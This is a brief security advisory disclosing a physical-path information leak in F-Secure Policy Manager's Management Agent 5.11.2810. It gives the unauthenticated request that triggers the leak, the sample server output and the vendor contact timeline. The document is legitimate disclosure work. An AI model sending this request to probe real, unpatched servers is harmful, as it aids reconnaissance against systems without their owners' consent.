F-Secure Policy Manager - Management Agent - physical path disclosure vulnerability
=====================================================================================

Version:
========

FSMSH Version 5.11.2810 - on Win32 (not tested on other platforms)


Vuln:
=====

A webserver is running on Port 80/tcp. Connecting to the port via a
webbrowser offers the
following link, available without authentication:

	/fsms/fsmsh.dll?FSMSCommand=GetVersion

Following this link will give the Version Number of the application:

	5.11.2810


However.... modifiying the link as follows:

	/fsms/fsmsh.dll?

will give the following result, containing the physical path of the
f-secure installation:

	FSMSH Version 5.11.2810
	Started at: 04/12/07 20:18:48
	Processed requests: 8780	
	Commdir path: C:\Programme\F-Secure\Management Server 5\CommDir
	COMMDIR: C:\Programme\F-Secure\Management Server 5\CommDir found
	C:\Programme\F-Secure\Management Server 5\CommDir\commdir.cfg found
	Repository API initialized - status: OK


Vendor:
=======

www.f-secure.com 
Informed by mail on 07.Dec.2004; Response at 08.Dec.; Will be fixed
anytime.


Discovered by:
==============

oliver karow
This document: http://www.oliverkarow.de/research/f-secure.txt